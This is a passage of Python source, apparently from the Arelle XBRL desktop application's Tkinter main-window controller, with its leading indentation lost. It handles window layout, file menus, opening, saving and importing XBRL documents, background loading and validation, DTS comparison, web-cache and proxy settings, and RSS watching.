paneWinTopBtm.add(paneWinLeftRt)
self.tabWinTopLeft = Notebook(paneWinLeftRt, width=250, height=300)
self.tabWinTopLeft.grid(row=0, column=0, sticky=(N, S, E, W))
paneWinLeftRt.add(self.tabWinTopLeft)
self.tabWinTopRt = Notebook(paneWinLeftRt)
self.tabWinTopRt.grid(row=0, column=0, sticky=(N, S, E, W))
self.tabWinTopRt.bind("<<NotebookTabChanged>>", self.onTabChanged)
paneWinLeftRt.add(self.tabWinTopRt)
self.tabWinBtm = Notebook(paneWinTopBtm)
self.tabWinBtm.grid(row=0, column=0, sticky=(N, S, E, W))
self.tabWinBtm.bind("<<NotebookTabChanged>>", self.onTabChanged)
paneWinTopBtm.add(self.tabWinBtm)
from arelle import ViewWinList
self.logView = ViewWinList.ViewList(None, self.tabWinBtm, _("messages"), True)
self.startLogging(logHandler=WinMainLogHandler(self)) # start logger
logViewMenu = self.logView.contextMenu(contextMenuClick=self.contextMenuClick)
logViewMenu.add_command(label=_("Clear"), underline=0, command=self.logClear)
logViewMenu.add_command(label=_("Save to file"), underline=0, command=self.logSaveToFile)
if self.hasClipboard:
logViewMenu.add_command(label=_("Copy to clipboard"), underline=0, command=lambda: self.logView.copyToClipboard(cntlr=self))
windowFrame.grid(row=0, column=0, sticky=(N,S,E,W))
windowFrame.columnconfigure(0, weight=999)
windowFrame.columnconfigure(1, weight=1)
windowFrame.rowconfigure(0, weight=1)
windowFrame.rowconfigure(1, weight=999)
windowFrame.rowconfigure(2, weight=1)
paneWinTopBtm.columnconfigure(0, weight=1)
paneWinTopBtm.rowconfigure(0, weight=1)
paneWinLeftRt.columnconfigure(0, weight=1)
paneWinLeftRt.rowconfigure(0, weight=1)
self.tabWinTopLeft.columnconfigure(0, weight=1)
self.tabWinTopLeft.rowconfigure(0, weight=1)
self.tabWinTopRt.columnconfigure(0, weight=1)
self.tabWinTopRt.rowconfigure(0, weight=1)
self.tabWinBtm.columnconfigure(0, weight=1)
self.tabWinBtm.rowconfigure(0, weight=1)
window = self.parent.winfo_toplevel()
window.columnconfigure(0, weight=1)
window.rowconfigure(0, weight=1)
priorState = self.config.get('windowState')
screenW = self.parent.winfo_screenwidth() - 16 # allow for window edge
screenH = self.parent.winfo_screenheight() - 64 # allow for caption and menus
if priorState == "zoomed":
self.parent.state("zoomed")
w = screenW
h = screenH
else:
priorGeometry = re.match(r"(\d+)x(\d+)[+]?([-]?\d+)[+]?([-]?\d+)", self.config.get('windowGeometry'))
if priorGeometry and priorGeometry.lastindex >= 4:
try:
w = int(priorGeometry.group(1))
h = int(priorGeometry.group(2))
x = int(priorGeometry.group(3))
y = int(priorGeometry.group(4))
if x + w > screenW:
if w < screenW:
x = screenW - w
else:
x = 0
w = screenW
elif x < 0:
x = 0
if w > screenW:
w = screenW
if y + h > screenH:
if y < screenH:
y = screenH - h
else:
y = 0
h = screenH
elif y < 0:
y = 0
if h > screenH:
h = screenH
self.parent.geometry("{0}x{1}+{2}+{3}".format(w,h,x,y))
except:
pass
# set top/btm divider
topLeftW, topLeftH = self.config.get('tabWinTopLeftSize',(250,300))
if 10 < topLeftW < w - 60:
self.tabWinTopLeft.config(width=topLeftW)
if 10 < topLeftH < h - 60:
self.tabWinTopLeft.config(height=topLeftH)
self.parent.title(_("arelle - Unnamed"))
self.logFile = None
self.uiThreadQueue = queue.Queue() # background processes communicate with ui thread
self.uiThreadChecker(self.statusbar) # start background queue
if not self.modelManager.disclosureSystem.select(self.config.setdefault("disclosureSystem", None)):
self.validateDisclosureSystem.set(False)
self.modelManager.validateDisclosureSystem = False
self.setValidateTooltipText()
def onTabChanged(self, event, *args):
try:
widgetIndex = event.widget.index("current")
tabId = event.widget.tabs()[widgetIndex]
for widget in event.widget.winfo_children():
if str(widget) == tabId:
self.currentView = widget.view
break
except (AttributeError, TypeError, TclError):
pass
def loadFileMenuHistory(self):
self.fileMenu.delete(self.fileMenuLength, self.fileMenuLength + 2)
fileHistory = self.config.setdefault("fileHistory", [])
self.recentFilesMenu = Menu(self.menubar, tearoff=0)
for i in range( min( len(fileHistory), 10 ) ):
self.recentFilesMenu.add_command(
label=fileHistory[i],
command=lambda j=i: self.fileOpenFile(self.config["fileHistory"][j]))
self.fileMenu.add_cascade(label=_("Recent files"), menu=self.recentFilesMenu, underline=0)
importHistory = self.config.setdefault("importHistory", [])
self.recentAttachMenu = Menu(self.menubar, tearoff=0)
for i in range( min( len(importHistory), 10 ) ):
self.recentAttachMenu.add_command(
label=importHistory[i],
command=lambda j=i: self.fileOpenFile(self.config["importHistory"][j],importToDTS=True))
self.fileMenu.add_cascade(label=_("Recent imports"), menu=self.recentAttachMenu, underline=0)
self.packagesMenu = Menu(self.menubar, tearoff=0)
hasPackages = False
for i, packageInfo in enumerate(sorted(PackageManager.packagesConfig.get("packages", []),
key=lambda packageInfo: packageInfo.get("name")),
start=1):
name = packageInfo.get("name", "package{}".format(i))
URL = packageInfo.get("URL")
if name and URL and packageInfo.get("status") == "enabled":
self.packagesMenu.add_command(
label=name,
command=lambda url=URL: self.fileOpenFile(url))
hasPackages = True
if hasPackages:
self.fileMenu.add_cascade(label=_("Packages"), menu=self.packagesMenu, underline=0)
def onPackageEnablementChanged(self):
self.loadFileMenuHistory()
def fileNew(self, *ignore):
if not self.okayToContinue():
return
self.logClear()
self.dirty = False
self.filename = None
self.data = {}
self.parent.title(_("arelle - Unnamed"));
self.modelManager.load(None);
def okayToContinue(self):
if not self.dirty:
return True
reply = tkinter.messagebox.askyesnocancel(
_("arelle - Unsaved Changes"),
_("Save unsaved changes?"),
parent=self.parent)
if reply is None:
return False
if reply:
return self.fileSave()
return True
def fileSave(self, view=None, fileType=None, *ignore):
if view is None:
view = getattr(self, "currentView", None)
if view is not None:
modelXbrl = view.modelXbrl
if isinstance(view, ViewWinRenderedGrid.ViewRenderedGrid):
initialdir = os.path.dirname(modelXbrl.modelDocument.uri)
if fileType in ("html", "xml", None):
if fileType == "html":
filename = self.uiFileDialog("save",
title=_("arelle - Save HTML-rendered Table"),
initialdir=initialdir,
filetypes=[(_("HTML file .html"), "*.html"), (_("HTML file .htm"), "*.htm")],
defaultextension=".html")
elif fileType == "xml":
filename = self.uiFileDialog("save",
title=_("arelle - Save Table Layout Model"),
initialdir=initialdir,
filetypes=[(_("Layout model file .xml"), "*.xml")],
defaultextension=".xml")
else: # ask file type
filename = self.uiFileDialog("save",
title=_("arelle - Save XBRL Instance or HTML-rendered Table"),
initialdir=initialdir,
filetypes=[(_("XBRL instance .xbrl"), "*.xbrl"), (_("XBRL instance .xml"), "*.xml"), (_("HTML table .html"), "*.html"), (_("HTML table .htm"), "*.htm")],
defaultextension=".html")
if filename and (filename.endswith(".xbrl") or filename.endswith(".xml")):
view.saveInstance(filename)
return True
if not filename:
return False
try:
ViewFileRenderedGrid.viewRenderedGrid(modelXbrl, filename, lang=self.labelLang, sourceView=view)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True
elif fileType == "xbrl":
return self.uiFileDialog("save",
title=_("arelle - Save Instance"),
initialdir=initialdir,
filetypes=[(_("XBRL instance .xbrl"), "*.xbrl"), (_("XBRL instance .xml"), "*.xml")],
defaultextension=".xbrl")
elif isinstance(view, ViewWinTests.ViewTests) and modelXbrl.modelDocument.type in (ModelDocument.Type.TESTCASESINDEX, ModelDocument.Type.TESTCASE):
filename = self.uiFileDialog("save",
title=_("arelle - Save Test Results"),
initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
filetypes=[(_("CSV file"), "*.csv")],
defaultextension=".csv")
if not filename:
return False
try:
ViewFileTests.viewTests(self.modelManager.modelXbrl, filename)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True
elif isinstance(view, ViewWinTree.ViewTree):
filename = self.uiFileDialog("save",
title=_("arelle - Save {0}").format(view.tabTitle),
initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
filetypes=[(_("CSV file"), "*.csv"),(_("HTML file"), "*.html"),(_("XML file"), "*.xml"),(_("JSON file"), "*.json")],
defaultextension=".csv")
if not filename:
return False
try:
if isinstance(view, ViewWinRoleTypes.ViewRoleTypes):
ViewFileRoleTypes.viewRoleTypes(modelXbrl, filename, view.tabTitle, view.isArcrole, lang=view.lang)
elif isinstance(view, ViewWinConcepts.ViewConcepts):
ViewFileConcepts.viewConcepts(modelXbrl, filename, labelrole=view.labelrole, lang=view.lang)
else:
ViewFileRelationshipSet.viewRelationshipSet(modelXbrl, filename, view.tabTitle, view.arcrole, labelrole=view.labelrole, lang=view.lang)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True
elif isinstance(view, ViewWinXml.ViewXml) and self.modelManager.modelXbrl.formulaOutputInstance:
filename = self.uiFileDialog("save",
title=_("arelle - Save Formula Result Instance Document"),
initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
filetypes=[(_("XBRL output instance .xml"), "*.xml"), (_("XBRL output instance .xbrl"), "*.xbrl")],
defaultextension=".xml")
if not filename:
return False
try:
from arelle import XmlUtil
with open(filename, "w") as fh:
XmlUtil.writexml(fh, self.modelManager.modelXbrl.formulaOutputInstance.modelDocument.xmlDocument, encoding="utf-8")
self.addToLog(_("[info] Saved formula output instance to {0}").format(filename) )
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
self.filename, err),
parent=self.parent)
return True
tkinter.messagebox.showwarning(_("arelle - Save what?"),
_("Nothing has been selected that can be saved. \nPlease select a view pane that can be saved."),
parent=self.parent)
'''
if self.filename is None:
filename = self.uiFileDialog("save",
title=_("arelle - Save File"),
initialdir=".",
filetypes=[(_("Xbrl file"), "*.x*")],
defaultextension=".xbrl")
if not filename:
return False
self.filename = filename
if not self.filename.endswith(".xbrl"):
self.filename += ".xbrl"
try:
with open(self.filename, "wb") as fh:
pickle.dump(self.data, fh, pickle.HIGHEST_PROTOCOL)
self.dirty = False
self.uiShowStatus(_("Saved {0} items to {1}").format(
len(self.data),
self.filename), clearAfter=5000)
self.parent.title(_("arelle - {0}").format(
os.path.basename(self.filename)))
except (EnvironmentError, pickle.PickleError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
self.filename, err),
parent=self.parent)
return True;
'''
def saveDTSpackage(self):
self.modelManager.saveDTSpackage(allDTSes=True)
def fileOpen(self, *ignore):
if not self.okayToContinue():
return
filename = self.uiFileDialog("open",
title=_("arelle - Open file"),
initialdir=self.config.setdefault("fileOpenDir","."),
filetypes=[(_("XBRL files"), "*.*")],
defaultextension=".xbrl")
if self.isMSW and "/Microsoft/Windows/Temporary Internet Files/Content.IE5/" in filename:
tkinter.messagebox.showerror(_("Loading web-accessed files"),
_('Please open web-accessed files with the second toolbar button, "Open web file", or the File menu, second entry, "Open web..."'), parent=self.parent)
return
if os.sep == "\\":
filename = filename.replace("/", "\\")
self.fileOpenFile(filename)
def importFileOpen(self, *ignore):
if not self.modelManager.modelXbrl or self.modelManager.modelXbrl.modelDocument.type not in (
ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE, ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL):
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Import requires an opened DTS"), parent=self.parent)
return False
filename = self.uiFileDialog("open",
title=_("arelle - Import file into opened DTS"),
initialdir=self.config.setdefault("importOpenDir","."),
filetypes=[(_("XBRL files"), "*.*")],
defaultextension=".xml")
if self.isMSW and "/Microsoft/Windows/Temporary Internet Files/Content.IE5/" in filename:
tkinter.messagebox.showerror(_("Loading web-accessed files"),
_('Please import web-accessed files with the File menu, fourth entry, "Import web..."'), parent=self.parent)
return
if os.sep == "\\":
filename = filename.replace("/", "\\")
self.fileOpenFile(filename, importToDTS=True)
def updateFileHistory(self, url, importToDTS):
key = "importHistory" if importToDTS else "fileHistory"
fileHistory = self.config.setdefault(key, [])
while fileHistory.count(url) > 0:
fileHistory.remove(url)
if len(fileHistory) > 10:
fileHistory[10:] = []
fileHistory.insert(0, url)
self.config[key] = fileHistory
self.loadFileMenuHistory()
self.saveConfig()
def fileOpenFile(self, filename, importToDTS=False, selectTopView=False):
if filename:
filesource = None
# check for archive files
filesource = openFileSource(filename, self,
checkIfXmlIsEis=self.modelManager.disclosureSystem and
self.modelManager.disclosureSystem.EFM)
if filesource.isArchive and not filesource.selection: # or filesource.isRss:
from arelle import DialogOpenArchive
filename = DialogOpenArchive.askArchiveFile(self, filesource)
if filename:
if importToDTS:
if not isHttpUrl(filename):
self.config["importOpenDir"] = os.path.dirname(filename)
else:
if not isHttpUrl(filename):
self.config["fileOpenDir"] = os.path.dirname(filesource.baseurl if filesource.isArchive else filename)
self.updateFileHistory(filename, importToDTS)
thread = threading.Thread(target=lambda: self.backgroundLoadXbrl(filesource,importToDTS,selectTopView))
thread.daemon = True
thread.start()
def webOpen(self, *ignore):
if not self.okayToContinue():
return
url = DialogURL.askURL(self.parent, buttonSEC=True, buttonRSS=True)
if url:
self.updateFileHistory(url, False)
filesource = openFileSource(url,self)
if filesource.isArchive and not filesource.selection: # or filesource.isRss:
from arelle import DialogOpenArchive
url = DialogOpenArchive.askArchiveFile(self, filesource)
self.updateFileHistory(url, False)
thread = threading.Thread(target=lambda: self.backgroundLoadXbrl(filesource,False,False))
thread.daemon = True
thread.start()
def importWebOpen(self, *ignore):
if not self.modelManager.modelXbrl or self.modelManager.modelXbrl.modelDocument.type not in (
ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE, ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL):
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Import requires an opened DTS"), parent=self.parent)
return False
url = DialogURL.askURL(self.parent, buttonSEC=False, buttonRSS=False)
if url:
self.fileOpenFile(url, importToDTS=True)
def backgroundLoadXbrl(self, filesource, importToDTS, selectTopView):
startedAt = time.time()
try:
if importToDTS:
action = _("imported")
profileStat = "import"
modelXbrl = self.modelManager.modelXbrl
if modelXbrl:
ModelDocument.load(modelXbrl, filesource.url)
modelXbrl.relationshipSets.clear() # relationships have to be re-cached
else:
action = _("loaded")
profileStat = "load"
modelXbrl = self.modelManager.load(filesource, _("views loading"))
except ModelDocument.LoadingException:
self.showStatus(_("Loading terminated, unrecoverable error"), 20000)
return
except Exception as err:
msg = _("Exception loading {0}: {1}, at {2}").format(
filesource.url,
err,
traceback.format_tb(sys.exc_info()[2]))
# not sure if message box can be shown from background thread
# tkinter.messagebox.showwarning(_("Exception loading"),msg, parent=self.parent)
self.addToLog(msg);
self.showStatus(_("Loading terminated, unrecoverable error"), 20000)
return
if modelXbrl and modelXbrl.modelDocument:
statTime = time.time() - startedAt
modelXbrl.profileStat(profileStat, statTime)
self.addToLog(format_string(self.modelManager.locale,
_("%s in %.2f secs"),
(action, statTime)))
if modelXbrl.hasTableRendering:
self.showStatus(_("Initializing table rendering"))
RenderingEvaluator.init(modelXbrl)
self.showStatus(_("{0}, preparing views").format(action))
self.waitForUiThreadQueue() # force status update
self.uiThreadQueue.put((self.showLoadedXbrl, [modelXbrl, importToDTS, selectTopView]))
else:
self.addToLog(format_string(self.modelManager.locale,
_("not successfully %s in %.2f secs"),
(action, time.time() - startedAt)))
def showLoadedXbrl(self, modelXbrl, attach, selectTopView=False):
startedAt = time.time()
currentAction = "setting title"
topView = None
self.currentView = None
try:
if attach:
modelXbrl.closeViews()
self.parent.title(_("arelle - {0}").format(
os.path.basename(modelXbrl.modelDocument.uri)))
self.setValidateTooltipText()
if modelXbrl.modelDocument.type in ModelDocument.Type.TESTCASETYPES:
currentAction = "tree view of tests"
ViewWinTests.viewTests(modelXbrl, self.tabWinTopRt)
topView = modelXbrl.views[-1]
elif modelXbrl.modelDocument.type == ModelDocument.Type.VERSIONINGREPORT:
currentAction = "view of versioning report"
ViewWinVersReport.viewVersReport(modelXbrl, self.tabWinTopRt)
from arelle.ViewWinDiffs import ViewWinDiffs
ViewWinDiffs(modelXbrl, self.tabWinBtm, lang=self.labelLang)
elif modelXbrl.modelDocument.type == ModelDocument.Type.RSSFEED:
currentAction = "view of RSS feed"
ViewWinRssFeed.viewRssFeed(modelXbrl, self.tabWinTopRt)
topView = modelXbrl.views[-1]
else:
if modelXbrl.hasTableIndexing:
currentAction = "table index view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.euGroupTable,)), lang=self.labelLang,
treeColHdr="Table Index", showLinkroles=False, showColumns=False, expandAll=True)
elif modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET):
currentAction = "table index view"
firstTableLinkroleURI = TableStructure.evaluateTableIndex(modelXbrl)
if firstTableLinkroleURI:
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.parentChild,)), lang=self.labelLang,
treeColHdr="Table Index", showRelationships=False, showColumns=False, expandAll=False, hasTableIndex=True)
'''
elif (modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET) and
not modelXbrl.hasTableRendering):
currentAction = "facttable ELRs view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.parentChild,)), lang=self.labelLang,
treeColHdr="Fact Table Index", showLinkroles=True, showColumns=False, showRelationships=False, expandAll=False)
'''
currentAction = "tree view of tests"
ViewWinDTS.viewDTS(modelXbrl, self.tabWinTopLeft, altTabWin=self.tabWinTopRt)
currentAction = "view of concepts"
ViewWinConcepts.viewConcepts(modelXbrl, self.tabWinBtm, "Concepts", lang=self.labelLang, altTabWin=self.tabWinTopRt)
if modelXbrl.hasTableRendering: # show rendering grid even without any facts
ViewWinRenderedGrid.viewRenderedGrid(modelXbrl, self.tabWinTopRt, lang=self.labelLang)
if topView is None: topView = modelXbrl.views[-1]
if modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET):
currentAction = "table view of facts"
if not modelXbrl.hasTableRendering: # table view only if not grid rendered view
ViewWinFactTable.viewFacts(modelXbrl, self.tabWinTopRt, linkrole=firstTableLinkroleURI, lang=self.labelLang, expandAll=firstTableLinkroleURI)
if topView is None: topView = modelXbrl.views[-1]
currentAction = "tree/list of facts"
ViewWinFactList.viewFacts(modelXbrl, self.tabWinTopRt, lang=self.labelLang)
if topView is None: topView = modelXbrl.views[-1]
if modelXbrl.hasFormulae:
currentAction = "formulae view"
ViewWinFormulae.viewFormulae(modelXbrl, self.tabWinTopRt)
if topView is None: topView = modelXbrl.views[-1]
currentAction = "presentation linkbase view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, XbrlConst.parentChild, lang=self.labelLang)
if topView is None: topView = modelXbrl.views[-1]
currentAction = "calculation linkbase view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, XbrlConst.summationItem, lang=self.labelLang)
currentAction = "dimensions relationships view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, "XBRL-dimensions", lang=self.labelLang)
if modelXbrl.hasTableRendering:
currentAction = "rendering view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, "Table-rendering", lang=self.labelLang)
for name, arcroles in sorted(self.config.get("arcroleGroups", {}).items()):
if XbrlConst.arcroleGroupDetect in arcroles:
currentAction = name + " view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, (name, arcroles), lang=self.labelLang)
currentAction = "property grid"
ViewWinProperties.viewProperties(modelXbrl, self.tabWinTopLeft)
currentAction = "log view creation time"
viewTime = time.time() - startedAt
modelXbrl.profileStat("view", viewTime)
self.addToLog(format_string(self.modelManager.locale,
_("views %.2f secs"), viewTime))
if selectTopView and topView:
topView.select()
self.currentView = topView
for xbrlLoadedMethod in pluginClassMethods("CntlrWinMain.Xbrl.Loaded"):
xbrlLoadedMethod(self, modelXbrl, attach) # runs in GUI thread
except Exception as err:
msg = _("Exception preparing {0}: {1}, at {2}").format(
currentAction,
err,
traceback.format_tb(sys.exc_info()[2]))
tkinter.messagebox.showwarning(_("Exception preparing view"),msg, parent=self.parent)
self.addToLog(msg);
self.showStatus(_("Ready..."), 2000)
def showFormulaOutputInstance(self, priorOutputInstance, currentOutputInstance):
currentAction = "closing prior formula output instance"
try:
if priorOutputInstance: # if has UI must close on UI thread, not background thread
priorOutputInstance.close()
currentAction = "showing resulting formula output instance"
if currentOutputInstance:
ViewWinXml.viewXml(currentOutputInstance, self.tabWinBtm, "Formula Output Instance", currentOutputInstance.modelDocument.xmlDocument)
except Exception as err:
msg = _("Exception {0}: {1}, at {2}").format(
currentAction,
err,
traceback.format_tb(sys.exc_info()[2]))
tkinter.messagebox.showwarning(_("Exception preparing view"),msg, parent=self.parent)
self.addToLog(msg);
self.showStatus(_("Ready..."), 2000)
def showProfileStats(self):
modelXbrl = self.modelManager.modelXbrl
if modelXbrl and self.modelManager.collectProfileStats:
modelXbrl.logProfileStats()
def clearProfileStats(self):
modelXbrl = self.modelManager.modelXbrl
if modelXbrl and self.modelManager.collectProfileStats:
modelXbrl.profileStats.clear()
def fileClose(self, *ignore):
if not self.okayToContinue():
return
self.modelManager.close()
self.parent.title(_("arelle - Unnamed"))
self.setValidateTooltipText()
def validate(self):
modelXbrl = self.modelManager.modelXbrl
if modelXbrl:
if (modelXbrl.modelManager.validateDisclosureSystem and
not modelXbrl.modelManager.disclosureSystem.selection):
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Validation - disclosure system checks is requested but no disclosure system is selected, please select one by validation - select disclosure system."),
parent=self.parent)
else:
if modelXbrl.modelDocument.type in ModelDocument.Type.TESTCASETYPES:
for pluginXbrlMethod in pluginClassMethods("Testcases.Start"):
pluginXbrlMethod(self, None, modelXbrl)
thread = threading.Thread(target=lambda: self.backgroundValidate())
thread.daemon = True
thread.start()
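# Background-thread worker for validate(): detaches formulaOutputInstance so it is
# not closed off the UI thread, runs validation, logs the elapsed time, then queues
# display of the formula output instance and log selection back onto the UI thread.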
def backgroundValidate(self):
startedAt = time.time()
modelXbrl = self.modelManager.modelXbrl
priorOutputInstance = modelXbrl.formulaOutputInstance
modelXbrl.formulaOutputInstance = None # prevent closing on background thread by validateFormula
self.modelManager.validate()
self.addToLog(format_string(self.modelManager.locale,
_("validated in %.2f secs"),
time.time() - startedAt))
if not modelXbrl.isClosed and (priorOutputInstance or modelXbrl.formulaOutputInstance):
self.uiThreadQueue.put((self.showFormulaOutputInstance, [priorOutputInstance, modelXbrl.formulaOutputInstance]))
self.uiThreadQueue.put((self.logSelect, []))
def compareDTSes(self):
countLoadedDTSes = len(self.modelManager.loadedModelXbrls)
if countLoadedDTSes != 2:
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Two DTSes are required for the Compare DTSes operation, {0} found").format(countLoadedDTSes),
parent=self.parent)
return False
versReportFile = self.uiFileDialog("save",
title=_("arelle - Save Versioning Report File"),
initialdir=self.config.setdefault("versioningReportDir","."),
filetypes=[(_("Versioning report file"), "*.xml")],
defaultextension=".xml")
if not versReportFile:
return False
self.config["versioningReportDir"] = os.path.dirname(versReportFile)
self.saveConfig()
thread = threading.Thread(target=lambda: self.backgroundCompareDTSes(versReportFile))
thread.daemon = True
thread.start()
def backgroundCompareDTSes(self, versReportFile):
startedAt = time.time()
modelVersReport = self.modelManager.compareDTSes(versReportFile)
if modelVersReport and modelVersReport.modelDocument:
self.addToLog(format_string(self.modelManager.locale,
_("compared in %.2f secs"),
time.time() - startedAt))
self.uiThreadQueue.put((self.showComparedDTSes, [modelVersReport]))
def showComparedDTSes(self, modelVersReport):
# close prior DTS displays
modelVersReport.modelDocument.fromDTS.closeViews()
modelVersReport.modelDocument.toDTS.closeViews()
self.showLoadedXbrl(modelVersReport, True)
def loadFile(self, filename):
self.filename = filename
self.listBox.delete(0, END)
self.dirty = False
try:
with open(self.filename, "rb") as fh:
self.data = pickle.load(fh)
for name in sorted(self.data, key=str.lower):
self.listBox.insert(END, name)
self.showStatus(_("Loaded {0} items from {1}").format(
self.listBox.size(),
self.filename), clearAfter=5000)
self.parent.title(_("arelle - {0}").format(
os.path.basename(self.filename)))
except (EnvironmentError, pickle.PickleError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to load {0}\n{1}").format(
self.filename,
err),
parent=self.parent)
def quit(self, event=None, restartAfterQuit=False):
if self.okayToContinue():
self.modelManager.close()
logging.shutdown()
global restartMain
restartMain = restartAfterQuit
state = self.parent.state()
if state == "normal":
self.config["windowGeometry"] = self.parent.geometry()
if state in ("normal", "zoomed"):
self.config["windowState"] = state
if self.isMSW: adjustW = 4; adjustH = 6 # tweak to prevent splitter regions from growing on reloading
elif self.isMac: adjustW = 54; adjustH = 39
else: adjustW = 2; adjustH = 2 # linux (tested on ubuntu)
self.config["tabWinTopLeftSize"] = (self.tabWinTopLeft.winfo_width() - adjustW,
self.tabWinTopLeft.winfo_height() - adjustH)
super(CntlrWinMain, self).close(saveConfig=True)
self.parent.unbind_all(())
self.parent.destroy()
if self.logFile:
self.logFile.close()
self.logFile = None
def restart(self, event=None):
self.quit(event, restartAfterQuit=True)
def setWorkOffline(self, *args):
self.webCache.workOffline = self.workOffline.get()
self.config["workOffline"] = self.webCache.workOffline
self.saveConfig()
def confirmClearWebCache(self):
if tkinter.messagebox.askyesno(
_("arelle - Clear Internet Cache"),
_("Are you sure you want to clear the internet cache?"),
parent=self.parent):
def backgroundClearCache():
self.showStatus(_("Clearing internet cache"))
self.webCache.clear()
self.showStatus(_("Internet cache cleared"), 5000)
thread = threading.Thread(target=lambda: backgroundClearCache())
thread.daemon = True
thread.start()
def manageWebCache(self):
if sys.platform.startswith("win"):
command = 'explorer'
elif sys.platform in ("darwin", "macos"):
command = 'open'
else: # linux/unix
command = 'xdg-open'
try:
subprocess.Popen([command,self.webCache.cacheDir])
except:
pass
def setupProxy(self):
from arelle.DialogUserPassword import askProxy
proxySettings = askProxy(self.parent, self.config.get("proxySettings"))
if proxySettings:
self.webCache.resetProxies(proxySettings)
self.config["proxySettings"] = proxySettings
self.saveConfig()
def setValidateDisclosureSystem(self, *args):
self.modelManager.validateDisclosureSystem = self.validateDisclosureSystem.get()
self.config["validateDisclosureSystem"] = self.modelManager.validateDisclosureSystem
self.saveConfig()
if self.modelManager.validateDisclosureSystem:
if not self.modelManager.disclosureSystem or not self.modelManager.disclosureSystem.selection:
self.selectDisclosureSystem()
self.setValidateTooltipText()
def selectDisclosureSystem(self, *args):
from arelle import DialogOpenArchive
self.config["disclosureSystem"] = DialogOpenArchive.selectDisclosureSystem(self, self.modelManager.disclosureSystem)
self.saveConfig()
self.setValidateTooltipText()
def formulaParametersDialog(self, *args):
DialogFormulaParameters.getParameters(self)
self.setValidateTooltipText()
def rssWatchOptionsDialog(self, *args):
from arelle import DialogRssWatch
DialogRssWatch.getOptions(self)
# find or open rssWatch view
def rssWatchControl(self, start=False, stop=False, close=False):
from arelle.ModelDocument import Type
from arelle import WatchRss
if not self.modelManager.rssWatchOptions.get("feedSourceUri"):
tkinter.messagebox.showwarning(_("RSS Watch Control Error"),
_("RSS Feed is not set up, please select options and select feed"),
parent=self.parent)
return False
rssModelXbrl = None
for loadedModelXbrl in self.modelManager.loadedModelXbrls:
if (loadedModelXbrl.modelDocument.type == Type.RSSFEED and
loadedModelXbrl.modelDocument.uri == self.modelManager.rssWatchOptions.get("feedSourceUri")):
rssModelXbrl = loadedModelXbrl
break
#not loaded
if start:
if not rssModelXbrl:
rssModelXbrl = self.modelManager.create(Type.RSSFEED, self.modelManager.rssWatchOptions.get("feedSourceUri"))
self.showLoadedXbrl(rssModelXbrl, False)
if not hasattr(rssModelXbrl,"watchRss"):
WatchRss.initializeWatcher(rssModelXbrl)
rssModelXbrl.watchRss.start()
elif stop:
if rssModelXbrl and rssModelXbrl.watchRss:
rssModelXbrl.watchRss.stop()
# for ui thread option updating
def rssWatchUpdateOption(self, latestPubDate=None):
self.uiThreadQueue.put((self.uiRssWatchUpdateOption, [latestPubDate]))
# ui thread addToLog
def uiRssWatchUpdateOption(self, latestPubDate):
if latestPubDate:
self.modelManager.rssWatchOptions["latestPubDate"] = latestPubDate
self.config["rssWatchOptions"] = self.modelManager.rssWatchOptions
self.saveConfig()
def languagesDialog(self, *args):
override = self.lang if self.lang != self.modelManager.defaultLang else ""
import tkinter.simpledialog
newValue = tkinter.simpledialog.askstring(_("arelle - Labels language code setting"),
_("The system default language is: {0} \n\n"
"You may override with a different language for labels display. \n\n"
"Current language override code: {1} \n"
"(Leave empty to use the system default language.)").format(
self.modelManager.defaultLang, override),
parent=self.parent)
if newValue is not None:
self.config["labelLangOverride"] = newValue
if newValue:
self.lang = newValue
else:
self.lang = self.modelManager.defaultLang
if self.modelManager.modelXbrl and self.modelManager.modelXbrl.modelDocument:
self.showLoadedXbrl(self.modelManager.modelXbrl, True) # reload views
self.saveConfig()
def setValidateTooltipText(self):
if self.modelManager.modelXbrl and not self.modelManager.modelXbrl.isClosed and self.modelManager.modelXbrl.modelDocument is not None:
valType = self.modelManager.modelXbrl.modelDocument.type
